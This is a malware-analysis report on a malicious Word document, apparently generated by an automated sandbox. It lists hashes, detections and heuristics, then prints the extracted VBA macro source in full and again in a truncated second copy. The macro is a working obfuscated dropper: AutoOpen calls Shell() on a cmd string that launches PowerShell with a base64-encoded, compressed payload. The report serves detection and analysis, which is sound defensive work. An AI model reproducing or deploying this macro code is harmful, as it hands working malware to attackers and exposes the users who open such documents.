Office (OLE) malware analysis — malicious · 1a67e07d2c59fb9e

MALICIOUS

Office (OLE)

96.5 KB Created: 2018-06-05 15:12:00 Authoring application: Microsoft Office Word First seen: 2018-07-08

MD5: d837fc45ad898138232eeb819ec1baec SHA-1: bbfe5f1e3db62c8e01734e379a8b94c5bf04d1d5 SHA-256: 1a67e07d2c59fb9e6ae6c2262ffc7416ca661de7aa54f648816554b033bfb289

210 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The Autoopen macro triggers the EQqnOnMBHwr function, which uses the Shell() function to execute a command. This command appears to be constructed from concatenated strings, likely to download and execute a second-stage payload. The specific command constructed is 'md OWocPlHvMsciw AMOXZLHdmMqFlAr dajMC zrHZVqqEhPwduZ & %c^o^m^S^p^E^c% %c^o^m^S^p^E^c^% ', indicating a dropper functionality.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6574517-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6574517-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code

Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA

Matched line in script

znZkH = Cos(CbHJw)
EQqnOnMBHwr = oOvDZiYA + Shell(uqwzWHNa + Chr(vYJHbsFsVj + vbKeyC + KjzRzmFo) + iKfVI + kUHNorY + EKoOwGiXbN + TRwZZsUzjk + MDFzo + sEDRqjv, 79691 - 79691)
BXHzFn = Hex(IikzF + Hex(jhXcLH) * 94567 + Round(tXcOf))

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
End Function
Sub Autoopen()
On Error Resume Next
```
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11626 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11626 bytes
SHA-256: `a2f29107f6ac9687700f493d7d5685998479a9f78762d7d625d2b903727216de`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "mBHNtDr" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function EQqnOnMBHwr() On Error Resume Next DirMs = Hex(RPQWiA + Hex(cUFPc) * 19848 + Round(NwrRZ)) qVfKs = Cos(PVYApZ) FEadjY = CDate(hUbqV) aSBFn = Cos(nYHvjF) DltDUQ = Hex(pFSnUH + Hex(XnVupo) * 34933 + Round(zTTMP)) NzIrXF = Cos(QoQGZ) kVzOkj = CDate(PllBtQ) znZkH = Cos(CbHJw) EQqnOnMBHwr = oOvDZiYA + Shell(uqwzWHNa + Chr(vYJHbsFsVj + vbKeyC + KjzRzmFo) + iKfVI + kUHNorY + EKoOwGiXbN + TRwZZsUzjk + MDFzo + sEDRqjv, 79691 - 79691) BXHzFn = Hex(IikzF + Hex(jhXcLH) * 94567 + Round(tXcOf)) YdINqS = Cos(fKImjN) IdNpTC = CDate(TfzwBw) HzikZo = Cos(faWHnu) End Function Sub Autoopen() On Error Resume Next XOqfu = Hex(zPJnu + Hex(YFzIRo) * 37338 + Round(XKdBGZ)) cDrijH = Cos(wQIRH) qspqpv = CDate(mhRFT) viMkp = Cos(UjWLS) EQqnOnMBHwr OVzIh = Hex(AjnIf + Hex(mMLKA) * 91772 + Round(mOMMvj)) TsmzTj = Cos(lbZQd) QEmjm = CDate(rwdMKf) ZjqBJD = Cos(BhHuo) End Sub Attribute VB_Name = "zzBkltXvVhcjZ" Function iKfVI() On Error Resume Next qTbSd = Hex(jFZwnI + Hex(BmujLC) * 75109 + Round(tdFpWY)) rZkDlj = Cos(WuzOS) bkFaFM = CDate(zUmzT) CwqWd = Cos(YhOzM) vTwFGawUu = "md OWocPl" + "HvMsciw" + " AM" + "OX" WwlPzh = Hex(koWJYi + Hex(JOzXnm) * 70307 + Round(dTjYW)) tQNks = Cos(iQXjUF) jhjnR = CDate(twJirM) wHSSjb = Cos(oqXJY) XsAaoWZH = "ZLHdmMqFlAr" + "dajMC zrHZV" + "qqEhPwduZ " + "& %^c^o^" + "m^S^p^E^" + "c^% %^c" + "^o^m^S^p^E^c" + "^% " mAtrPC = Hex(kBhzjP + Hex(cLjiWY) * 35548 + Round(bzFAsu)) sKXOk = Cos(sDSTo) pzZVmU = CDate(icGomA) tYvmO = Cos(nXIWa) lYVlWFWaR = " /V " + " " + " /" + "c " + " set %ab" + "HShlkMPZfWuUO%" + "=wkKEMWQ&&s" + "et %RGmTJitE" ickIR = Hex(itdvC + Hex(SjzLkm) * 42037 + Round(OXKTHj)) irRoC = Cos(UpSwUp) EGkzWT = CDate(iMbnW) pDGRQ = Cos(lJDCL) KkSmE = "d%" + "=p&&set %aKjQ" + "ChliTiwpzZ%" + "=o^w&&" + "set %zpRnh" + "uwtcraRB" + "SO%=RLnbh" + "tzvVqf&&set %" zhwqi = Hex(PwvfH + Hex(MwoMWR) * 30698 + Round(SBERiB)) TEQAEZ = Cos(WlVrhN) ZFKvU = CDate(TMYmm) howcjH = Cos(fvsifD) pMjGR = "ODXsRTvRsj%=!" + "%RGmTJitEd%!" + "&&set %RLSpMD" + "LHc" WZCrf = Hex(CFswuW + Hex(wOHfi) * 27639 + Round(sCYJo)) Eichai = Cos(HitKhH) kbvBh = CDate(tjRoM) RlVUA = Cos(DvfUcL) GdKCDmL = "QzCRSj%=fTDMik" + "G&&" + "set" + " %IzCcMFBIMs" + "ZvY%=e^r&" + "&set %UNmWuQSj" + "vFajz%" + "=!%aKjQC" QiHOU = Hex(wWMiQG + Hex(bdqYQ) * 77401 + Round(aNGmO)) RdLWQw = Cos(jRjlRw) OdEDEN = CDate(QZEHDo) vCYVAc = Cos(ULpRRW) ZPXEGnmrqq = "hliTiwpzZ%!&&s" + "et %Fabz" + "iGv%=s&&set" + " %ttZ" + "uiGqWRrP" + "fhJB%=OqKlOTJ" + "VJ&&set %GS" + "krr" iKfVI = vTwFGawUu + XsAaoWZH + lYVlWFWaR + KkSmE + pMjGR + GdKCDmL + ZPXEGnmrqq End Function Function kUHNorY() On Error Resume Next KwFGTw = Hex(wIChA + Hex(ADGPM) * 19083 + Round(lOIQRU)) tSPlm = Cos(nGczAk) kwtVnz = CDate(dQEaF) dFvoo = Cos(wjNdtR) KCUnYjwXYlB = "PlSb" + "GMc" + "A%=he&&set %r" + "bQuZCXXdlN%=ll&" + "&!%ODXsRTv" JbuaHO = Hex(RHmUmc + Hex(HjcOp) * 61421 + Round(NhKoLL)) IXVADs = Cos(ljqwLc) VTbBLY = CDate(AlPElP) tkmwDq = Cos(kRUjk) fkGsU = "Rsj%!!%UNm" + "WuQSjvFajz%!!" + "%IzCcMFBIMs" + "ZvY%!!%Fabzi" + "Gv%!!%GSkrrP" + "lSbGMcA" VzmRdC = Hex(sOjmzm + Hex(ImFvRd) * 90701 + Round(zDAHmh)) CGSbzV = Cos(wzaib) iBAwQ = CDate(AzLYRG) dAiQWQ = Cos(GMcTX) wWICp = "%!!%r" + "bQuZ" + "CXXdlN%! -e" + " KABuAEUAVwAtA" + "G8AYgBqAEUAY" + "wBUACAAIABTAHk" + "AUwBUAGUAbQ" ZHnHVj = Hex(rNwCD + Hex(phnqhB) * 39938 + Round(sAQhD)) UwSYj = Cos(bXsKD) iEnPC = CDate(MjbZTV) SCWhHX = Cos(RRivvZ) oWVhFVkSPC = "AuAE" + "kAbwAu" + "AEMAbwBtAHAAcgB" + "FAFMAcwBJ" + "AG8AbgAuAG" + "QA" iOSpc = Hex(iTPicw + Hex(UXqudw) * 57286 + Round(WEplm)) mQWsUc = Cos(iRIkq) QznsEI = CDate(FtanRw) IIJcDq = Cos(sCtlH) jjFhLIG = "RQBmAGwAYQ" + "BUAE" + "UAUwB0AFIARQB" + "hAE0AKABbA" + "HMAW" + "QBzAHQAR" + "QBtAC4AaQBPAC4" + "ATQBFAG0AbwB" + "SAFkAUwB0AHI" + "AZQBBAG" amGiK = Hex(ONOjMk + Hex(zWsqja) * 42146 + Round(BZHfjA)) XztGz = Cos(MTmsdf) iuZzrb = CDate(ozLJLl) ZNzCdm = Cos(pQpFnp) tEGDwfVuhcm = "0AXQAgAFsA" + "UwBZAFMAVABl" + "AG0ALgBjAG8ATg" + "BWAEUAUgB0AF0" + "AOgA6AGYA" + "UgBvAE" DFwFvl = Hex(HzJnEJ + Hex(YljvLz) * 76410 + Round(npzst)) dkrEmD = Cos(tNDPAr) NpOZc = CDate(RfFKb) wzSIGC = Cos(FiPRjS) twKAocSfVmO = "0AQgB" + "hAFMARQ" + "A2" + "ADQAUwB0AFIA" + "SQBOAGcA" + "KAA" + "nAFYAW" + "gBCA" + "GQAVAA5AH" + "MAdwBGAEkAYgAvA" wiXjj = Hex(GVtwa + Hex(Qkbzih) * 54689 + Round(FnbEzM)) mozXi = Cos(WKmHZ) PldEUi = CDate(lHdjlk) XAKDS = Cos(TEUhva) iGoTodc = "GkAaQA" + "4AGkAcABkAFc" + "AbwBEAFcATg" + "BvAEQA" + "UgBG" + "AFMAdAB4AF" + "UAMgBhAF" + "MAcAAwAEIASgB" + "hAEMAaw" TuaopF = Hex(MIbjG + Hex(RazIH) * 23624 + Round(XiVzjp)) KLRvIt = Cos(Mrjoqf) uOZbww = CDate(sELaj) XkZbFA = Cos(sArja) lmtINqi = "BKAEQAa" + "gBuAEcARABuA" + "HcAOA" + "A3AHMAMAA" + "2AFoA" + "VgAxAGYAKwBPAF" + "MAeQBqAFMAY" kUHNorY = KCUnYjwXYlB + fkGsU + wWICp + oWVhFVkSPC + jjFhLIG + tEGDwfVuhcm + twKAocSfVmO + iGoTodc + lmtINqi End Function Function EKoOwGiXbN() On Error Resume Next jFjST = Hex(jGcUw + Hex(ntZSH) * 11146 + Round(ZGObS)) jqQou = Cos(sAjML) lsJCj = CDate(QcDSHo) tlLBG = Cos(iRNja) cAPanS = "gBtAHoAWg" + "A3AC8AUABxAE" + "gAR" + "AAz" + "AEIAVABZADcAVA" + "BU" SiwDY = Hex(jOJVN + Hex(WaTKp) * 4210 + Round(jcOAl)) wcrjrX = Cos(inOMT) fOaaQ = CDate(YzfjB) bLSrn = Cos(hKWZb) QzrOBiJ = "AHAA" + "RQBMAG8AcQBFAG" + "IAb" + "QBhAHcARQ" + "BnAGMAUgB" hRzEdj = Hex(HqQXC + Hex(CwdNi) * 35880 + Round(qMQMpr)) LiJCFn = Cos(swZTVw) udKoP = CDate(lEEzoH) wVBlOl = Cos(AchORP) cisjQI = "5AG4AWgBzAG0AR" + "ABzAHAAZgB" + "YAFoAWAAr" + "AEgAeQBVAGIAaA" + "A5AEQAUQBhA" + "DA" JADuM = Hex(cwiFY + Hex(JOGaLO) * 96159 + Round(mXwoE)) MURwwW = Cos(LbEAD) kCCmvN = CDate(cVuBVz) GlmDP = Cos(bJIimJ) BOsfdaK = "AQwBh" + "AFE" + "Adg" + "BhA" + "GoAVgBx" + "AEEA" + "eA" + "BEAHAA" aznBZ = Hex(mNHjk + Hex(aQHrZ) * 30851 + Round(wCtaoA)) NzbuYz = Cos(LOihsc) NGzBC = CDate(pZURi) LMzjX = Cos(AoumlN) CMcDsXQGrd = "Yg" + "AvAGUAU" + "ABY" + "AGcAdwBWA" + "EE" + "AaQB0AHUAZQBNA" + "GwAZAB3AFoATA" + "BXAEEARgBsAGwA" + "TgBoAEcAdABaA" + "GgAdwBSAG" kOOBd = Hex(jnNjv + Hex(Ymwwof) * 18296 + Round(KnaMi)) jsoSa = Cos(mrRoa) rIBaw = CDate(DlzMCr) HcBAw = Cos(CTWaoz) ELLdkTzSEds = "IAMwAyAGM" + "AO" + "QB2ADYA" + "ZQ" + "B6ADcA" + "cABXAEMAVA" + "BkADQAdwAzAD" + "AASAB" + "DAHIATgBIA" JaIhVJ = Hex(QoBKj + Hex(zJwHWq) * 93449 + Round(SslqU)) YEUhM = Cos(DTcdSr) VqSaqQ = CDate(qsWOD) CjqiXq = Cos(JzLTT) SOorpRfc = "GkA" + "SQBvAG0AUw" + "BxAD" + "QAUwAvAGcAbQBF" + "AE4AagBsA" + "GIA" + "OQBYA" + "HkAdQ" + "BKA" + "HkAVAB5AEQAa" ImihTp = Hex(zaUARu + Hex(MJfhGi) * 27069 + Round(TcuGb)) jYfzHs = Cos(UMLDZ) AbPqQ = CDate(PnzSdN) kjTBmN = Cos(pOCoB) zIzBrMckS = "gBKAG8Acg" + "B5A" + "E8AaABWAEo" + "AOQ" + "BGAEcAdQA4AGk" + "AegB6AEUAZABS" + "AEkAYwAyAE" + "MA" + "YgBzACs" + "Aa" EKoOwGiXbN = cAPanS + QzrOBiJ + cisjQI + BOsfdaK + CMcDsXQGrd + ELLdkTzSEds + SOorpRfc + zIzBrMckS End Function Function TRwZZsUzjk() On Error Resume Next CSszT = Hex(jGNzDl + Hex(dLCjFB) * 71870 + Round(IYBKZ)) LimZap = Cos(azvBw) hiWlPP = CDate(jBmiw) Psttqm = Cos(oUYaYd) rClzAQbQLwl = "QB4AEwAVwA3" + "AEUAKwBDAE4" + "AZ" + "gBvAFIAcwBWAD" + "UAbQAxAEIARQBGA" + "EsAcgB" + "hAG8AKwBWA" + "GoAcQBXADg" + "AVwB" YDOGhH = Hex(Ejlnl + Hex(QGKvIc) * 76066 + Round(MjDFP)) LMKwN = Cos(Tjjnjw) kLJIGE = CDate(ihKcSv) WLXKBS = Cos(rrZpZ) NQQPljw = "ZAHkANwAyAHoA" + "KwA4AEoAN" + "QAxAEgA" + "aQA" + "3AEoAUgBXA" bjaWPL = Hex(DODXwA + Hex(ZdBhd) * 33796 + Round(wXIcfi)) sTkThF = Cos(zGoNH) mIIzN = CDate(vdOpr) HBiJR = Cos(khAKuT) PYKfLPb = "HIAeAB0AHUAaQB" + "uAGIANAArAF" + "YAMAA5AG8AVwBG" + "AE4ARwBsA" + "HIAaABZAE4" + "AdwBFAGc" + "ANwBqAFkASABG" + "AC8AbQAvAC" + "8AZABXAHcAc" + "AA2" PuGcX = Hex(UWILo + Hex(JOiiJ) * 58273 + Round(sIZDlo)) ucaJbN = Cos(uwFoAq) Wozqqt = CDate(fGwqj) awqqV = Cos(iTswwj) Joacj = "AFgAM" + "QBUAEQAR" + "wBnAGMAbgBSACsA" + "VAAwADUARABUADY" + "ALwBOAFUAV" TRwZZsUzjk = rClzAQbQLwl + NQQPljw + PYKfLPb + Joacj End Function Function MDFzo() On Error Resume Next aOQYtI = Hex(BWTZNv + Hex(jPWbSu) * 91936 + Round(wHOTM)) IisBG = Cos(TtOhE) tPEdRd = CDate(tBEVUj) fLQJJa = Cos(itsaYG) SUnDPzvLU = "ABCAF" + "oAZgB5AGEAZw" + "ArAEEAWAB" + "wADEAN" + "wBSA" + "FMAMwA1AFIATQBL" + "AG4AMABK" + "ACsASABzAG" + "4AOQBUA" + "FcARQBNAFkARgA4" bnApWj = Hex(jKUql + Hex(SGDIXU) * 33754 + Round(HcFXin)) WMCsX = Cos(SNEjww) zAvSYi = CDate(XpjCDo) TLvRsw = Cos(JwSzNw) wEvXa = "AFkA" + "QwBGADMA" + "SQBRAC8AQw" + "A2A" + "GsAbQA" + "1AGQA" + "RQB" + "hA" tzbZY = Hex(jGjmwv + Hex(qhczp) * 66447 + Round(wCJOFA)) qCdVK = Cos(cipHdf) OMiIT = CDate(mwbWSI) BBqqMU = Cos(csEDR) Zqnfj = "GQASQBiAEgARwA3" + "AFIAY" + "gByA" + "GEAOQBkAGoAbwA" LiLrUW = Hex(XilXA + Hex(IOFOjK) * 24679 + Round(ianwuI)) jVIbq = Cos(kDkkBw) ITPSpR = CDate(JXiYs) IdHXs = Cos(NCoMd) tdAfGvsvnH = "xAG" + "4AYQA0AE" + "4AegA2ADkAVQBE" + "AFEAZ" + "QB" + "VADMAcABrAEUAdg" + "BiAEMAWAB3AGYA" KQXKUi = Hex(OOXOKV + Hex(dzzMr) * 69719 + Round(lWHwMr)) iwUHmW = Cos(AnzCzt) qlOwCj = CDate(QEbUtN) uQOIn = Cos(jRDHY) dGsIzP = "QwBJADkAQ" + "wBPAEgAY" + "wBZAEo" + "AZQB3ADIAaA" + "B1" + "AGoAUQBEAG4AMwB" + "uAC" + "8AagB6AEkAKwBvA" + "DQ" + "AcAAzAGcASwBPA" ddJwJs = Hex(EulszJ + Hex(fRssn) * 86998 + Round(GFXlt)) pzYhH = Cos(EGSHF) cCJdI = CDate(OwjYO) LTfpW = Cos(lNQfB) NMuzKcjI = "FMAMgBzAHcA" + "cABoAEo" + "ASQ" + "AxAEQARQB" + "qAHoAVAB5" + "ADcAVwB" + "BAEYAcABYAFIAZA" + "BPAF" + "kATAAzAG4" + "AaQA4AD" MDFzo = SUnDPzvLU + wEvXa + Zqnfj + tdAfGvsvnH + dGsIzP + NMuzKcjI End Function Function sEDRqjv() On Error Resume Next VDkbF = Hex(MKmZL + Hex(zdzAWu) * 62246 + Round(jzWot)) jvVsC = Cos(BCHFmn) fMEmlI = CDate(ptalqV) jXWjwh = Cos(RRouXP) jTJur = "IANwAwAEMAJwA" + "pACA" + "ALAAgAFs" + "ASQBPAC4AYwBPAE" zVrNjA = Hex(FfNlf + Hex(YqUkC) * 63355 + Round(RflZpF)) OuPsN = Cos(wsYjYG) wisIv = CDate(cRawD) qSYSjS = Cos(dzmKP) XlIwhTPnkIk = "0AUAByAGUAcw" + "BTAEkAbw" + "BuAC4A" + "QwBPAE0AUA" + "BSA" + "GUAUwBTA" + "GkAbwBOAG0ATwBk" + "AEUAXQA6ADoAZA" + "BlAGMATw" + "BNAHAAcgBlA" XmGjR = Hex(MvMwmm + Hex(dYcmnz) * 23024 + Round(WbZao)) BcWLT = Cos(nXiWlJ) rwiTm = CDate(GowBKz) DUBLh = Cos(cULSp) nAwKMPJMw = "HMAUwAgACkAIA" + "B8ACAAJQ" + "B7ACAAbgBFAFc" + "ALQBvAGIAagBF" + "AGMAVAAgAC" + "AAa" SJoGuG = Hex(dmUDs + Hex(mvicC) * 52897 + Round(LHZTW)) ofjqj = Cos(ojTVSi) vJVai = CDate(IDuJu) IqdbLk = Cos(kaRVz) ruDzGO = "QBPAC" + "4AUwB" + "0AH" + "IAZ" + "QBhAG0" nZEbTa = Hex(uwjCp + Hex(qCNPuV) * 72865 + Round(YnKEIk)) zddoYf = Cos(rEbbji) JKblit = CDate(WLXzL) PmtXKp = Cos(wVCOR) ikHWwbwLq = "AcgBlAGEAZABF" + "AH" + "IAKAAgA" + "CQAXwAgAC" + "wA" + "IABbAFMAeQBTAH" + "QA" + "RQBNAC4AV" + "ABFAFgAVAA" + "uAE" vKJnS = Hex(HAOcjS + Hex(rcbSGo) * 24284 + Round(fFKEQu)) BoHMT = Cos(wINXEN) wBJKE = CDate(zqVDwa) TQFwj = Cos(rwwZU) DfIwjjUlLn = "UAbgBDA" + "G8" + "AZABJAE" + "4AZwBdADoAOgBhA" + "HMAYwBJAEk" + "AKQAgAH0AI" wAtUN = Hex(BaIldv + Hex(zjwUj) * 71049 + Round(mOJhD)) oCWHw = Cos(onGjEW) IuAwi = CDate(JwjSuc) oJkjq = Cos(QzGwD) bUjkCVWc = "AApAC4Ac" + "gBlAGEAZAB0AE" + "8AZQBOAGQA" + "KAAgACkAfABpAG4" + "AdgBvAGsAZQA" + "tAGUAeABQAFIARQ" + "BzAHMAa" + "QBPAG4A" sEDRqjv = jTJur + XlIwhTPnkIk + nAwKMPJMw + ruDzGO + ikHWwbwLq + DfIwjjUlLn + bUjkCVWc End Function

SHA-256: a2f29107f6ac9687700f493d7d5685998479a9f78762d7d625d2b903727216de

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "mBHNtDr"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function EQqnOnMBHwr()
On Error Resume Next
DirMs = Hex(RPQWiA + Hex(cUFPc) * 19848 + Round(NwrRZ))
qVfKs = Cos(PVYApZ)
FEadjY = CDate(hUbqV)
aSBFn = Cos(nYHvjF)
DltDUQ = Hex(pFSnUH + Hex(XnVupo) * 34933 + Round(zTTMP))
NzIrXF = Cos(QoQGZ)
kVzOkj = CDate(PllBtQ)
znZkH = Cos(CbHJw)
EQqnOnMBHwr = oOvDZiYA + Shell(uqwzWHNa + Chr(vYJHbsFsVj + vbKeyC + KjzRzmFo) + iKfVI + kUHNorY + EKoOwGiXbN + TRwZZsUzjk + MDFzo + sEDRqjv, 79691 - 79691)
BXHzFn = Hex(IikzF + Hex(jhXcLH) * 94567 + Round(tXcOf))
YdINqS = Cos(fKImjN)
IdNpTC = CDate(TfzwBw)
HzikZo = Cos(faWHnu)
End Function
Sub Autoopen()
On Error Resume Next
XOqfu = Hex(zPJnu + Hex(YFzIRo) * 37338 + Round(XKdBGZ))
cDrijH = Cos(wQIRH)
qspqpv = CDate(mhRFT)
viMkp = Cos(UjWLS)
EQqnOnMBHwr
OVzIh = Hex(AjnIf + Hex(mMLKA) * 91772 + Round(mOMMvj))
TsmzTj = Cos(lbZQd)
QEmjm = CDate(rwdMKf)
ZjqBJD = Cos(BhHuo)
End Sub


Attribute VB_Name = "zzBkltXvVhcjZ"
Function iKfVI()
On Error Resume Next
qTbSd = Hex(jFZwnI + Hex(BmujLC) * 75109 + Round(tdFpWY))
rZkDlj = Cos(WuzOS)
bkFaFM = CDate(zUmzT)
CwqWd = Cos(YhOzM)
vTwFGawUu = "md OWocPl" + "HvMsciw" + " AM" + "OX"
WwlPzh = Hex(koWJYi + Hex(JOzXnm) * 70307 + Round(dTjYW))
tQNks = Cos(iQXjUF)
jhjnR = CDate(twJirM)
wHSSjb = Cos(oqXJY)
XsAaoWZH = "ZLHdmMqFlAr" + "dajMC zrHZV" + "qqEhPwduZ " + "&     %^c^o^" + "m^S^p^E^" + "c^%     %^c" + "^o^m^S^p^E^c" + "^% "
mAtrPC = Hex(kBhzjP + Hex(cLjiWY) * 35548 + Round(bzFAsu))
sKXOk = Cos(sDSTo)
pzZVmU = CDate(icGomA)
tYvmO = Cos(nXIWa)
lYVlWFWaR = "    /V " + "   " + "     /" + "c   " + "        set %ab" + "HShlkMPZfWuUO%" + "=wkKEMWQ&&s" + "et %RGmTJitE"
ickIR = Hex(itdvC + Hex(SjzLkm) * 42037 + Round(OXKTHj))
irRoC = Cos(UpSwUp)
EGkzWT = CDate(iMbnW)
pDGRQ = Cos(lJDCL)
KkSmE = "d%" + "=p&&set %aKjQ" + "ChliTiwpzZ%" + "=o^w&&" + "set %zpRnh" + "uwtcraRB" + "SO%=RLnbh" + "tzvVqf&&set %"
zhwqi = Hex(PwvfH + Hex(MwoMWR) * 30698 + Round(SBERiB))
TEQAEZ = Cos(WlVrhN)
ZFKvU = CDate(TMYmm)
howcjH = Cos(fvsifD)
pMjGR = "ODXsRTvRsj%=!" + "%RGmTJitEd%!" + "&&set %RLSpMD" + "LHc"
WZCrf = Hex(CFswuW + Hex(wOHfi) * 27639 + Round(sCYJo))
Eichai = Cos(HitKhH)
kbvBh = CDate(tjRoM)
RlVUA = Cos(DvfUcL)
GdKCDmL = "QzCRSj%=fTDMik" + "G&&" + "set" + " %IzCcMFBIMs" + "ZvY%=e^r&" + "&set %UNmWuQSj" + "vFajz%" + "=!%aKjQC"
QiHOU = Hex(wWMiQG + Hex(bdqYQ) * 77401 + Round(aNGmO))
RdLWQw = Cos(jRjlRw)
OdEDEN = CDate(QZEHDo)
vCYVAc = Cos(ULpRRW)
ZPXEGnmrqq = "hliTiwpzZ%!&&s" + "et %Fabz" + "iGv%=s&&set" + " %ttZ" + "uiGqWRrP" + "fhJB%=OqKlOTJ" + "VJ&&set %GS" + "krr"
iKfVI = vTwFGawUu + XsAaoWZH + lYVlWFWaR + KkSmE + pMjGR + GdKCDmL + ZPXEGnmrqq
End Function
Function kUHNorY()
On Error Resume Next
KwFGTw = Hex(wIChA + Hex(ADGPM) * 19083 + Round(lOIQRU))
tSPlm = Cos(nGczAk)
kwtVnz = CDate(dQEaF)
dFvoo = Cos(wjNdtR)
KCUnYjwXYlB = "PlSb" + "GMc" + "A%=he&&set %r" + "bQuZCXXdlN%=ll&" + "&!%ODXsRTv"
JbuaHO = Hex(RHmUmc + Hex(HjcOp) * 61421 + Round(NhKoLL))
IXVADs = Cos(ljqwLc)
VTbBLY = CDate(AlPElP)
tkmwDq = Cos(kRUjk)
fkGsU = "Rsj%!!%UNm" + "WuQSjvFajz%!!" + "%IzCcMFBIMs" + "ZvY%!!%Fabzi" + "Gv%!!%GSkrrP" + "lSbGMcA"
VzmRdC = Hex(sOjmzm + Hex(ImFvRd) * 90701 + Round(zDAHmh))
CGSbzV = Cos(wzaib)
iBAwQ = CDate(AzLYRG)
dAiQWQ = Cos(GMcTX)
wWICp = "%!!%r" + "bQuZ" + "CXXdlN%!  -e" + " KABuAEUAVwAtA" + "G8AYgBqAEUAY" + "wBUACAAIABTAHk" + "AUwBUAGUAbQ"
ZHnHVj = Hex(rNwCD + Hex(phnqhB) * 39938 + Round(sAQhD))
UwSYj = Cos(bXsKD)
iEnPC = CDate(MjbZTV)
SCWhHX = Cos(RRivvZ)
oWVhFVkSPC = "AuAE" + "kAbwAu" + "AEMAbwBtAHAAcgB" + "FAFMAcwBJ" + "AG8AbgAuAG" + "QA"
iOSpc = Hex(iTPicw + Hex(UXqudw) * 57286 + Round(WEplm))
mQWsUc = Cos(iRIkq)
QznsEI = CDate(FtanRw)
IIJcDq = Cos(sCtlH)
jjFhLIG = "RQBmAGwAYQ" + "BUAE" + "UAUwB0AFIARQB" + "hAE0AKABbA" + "HMAW" + "QBzAHQAR" + "QBtAC4AaQBPAC4" + "ATQBFAG0AbwB" + "SAFkAUwB0AHI" + "AZQBBAG"
amGiK = Hex(ONOjMk + Hex(zWsqja) * 42146 + Round(BZHfjA))
XztGz = Cos(MTmsdf)
iuZzrb = CDate(ozLJLl)
ZNzCdm = Cos(pQpFnp)
tEGDwfVuhcm = "0AXQAgAFsA" + "UwBZAFMAVABl" + "AG0ALgBjAG8ATg" + "BWAEUAUgB0AF0" + "AOgA6AGYA" + "UgBvAE"
DFwFvl = Hex(HzJnEJ + Hex(YljvLz) * 76410 + Round(npzst))
dkrEmD = Cos(tNDPAr)
NpOZc = CDate(RfFKb)
wzSIGC = Cos(FiPRjS)
twKAocSfVmO = "0AQgB" + "hAFMARQ" + "A2" + "ADQAUwB0AFIA" + "SQBOAGcA" + "KAA" + "nAFYAW" + "gBCA" + "GQAVAA5AH" + "MAdwBGAEkAYgAvA"
wiXjj = Hex(GVtwa + Hex(Qkbzih) * 54689 + Round(FnbEzM))
mozXi = Cos(WKmHZ)
PldEUi = CDate(lHdjlk)
XAKDS = Cos(TEUhva)
iGoTodc = "GkAaQA" + "4AGkAcABkAFc" + "AbwBEAFcATg" + "BvAEQA" + "UgBG" + "AFMAdAB4AF" + "UAMgBhAF" + "MAcAAwAEIASgB" + "hAEMAaw"
TuaopF = Hex(MIbjG + Hex(RazIH) * 23624 + Round(XiVzjp))
KLRvIt = Cos(Mrjoqf)
uOZbww = CDate(sELaj)
XkZbFA = Cos(sArja)
lmtINqi = "BKAEQAa" + "gBuAEcARABuA" + "HcAOA" + "A3AHMAMAA" + "2AFoA" + "VgAxAGYAKwBPAF" + "MAeQBqAFMAY"
kUHNorY = KCUnYjwXYlB + fkGsU + wWICp + oWVhFVkSPC + jjFhLIG + tEGDwfVuhcm + twKAocSfVmO + iGoTodc + lmtINqi
End Function
Function EKoOwGiXbN()
On Error Resume Next
jFjST = Hex(jGcUw + Hex(ntZSH) * 11146 + Round(ZGObS))
jqQou = Cos(sAjML)
lsJCj = CDate(QcDSHo)
tlLBG = Cos(iRNja)
cAPanS = "gBtAHoAWg" + "A3AC8AUABxAE" + "gAR" + "AAz" + "AEIAVABZADcAVA" + "BU"
SiwDY = Hex(jOJVN + Hex(WaTKp) * 4210 + Round(jcOAl))
wcrjrX = Cos(inOMT)
fOaaQ = CDate(YzfjB)
bLSrn = Cos(hKWZb)
QzrOBiJ = "AHAA" + "RQBMAG8AcQBFAG" + "IAb" + "QBhAHcARQ" + "BnAGMAUgB"
hRzEdj = Hex(HqQXC + Hex(CwdNi) * 35880 + Round(qMQMpr))
LiJCFn = Cos(swZTVw)
udKoP = CDate(lEEzoH)
wVBlOl = Cos(AchORP)
cisjQI = "5AG4AWgBzAG0AR" + "ABzAHAAZgB" + "YAFoAWAAr" + "AEgAeQBVAGIAaA" + "A5AEQAUQBhA" + "DA"
JADuM = Hex(cwiFY + Hex(JOGaLO) * 96159 + Round(mXwoE))
MURwwW = Cos(LbEAD)
kCCmvN = CDate(cVuBVz)
GlmDP = Cos(bJIimJ)
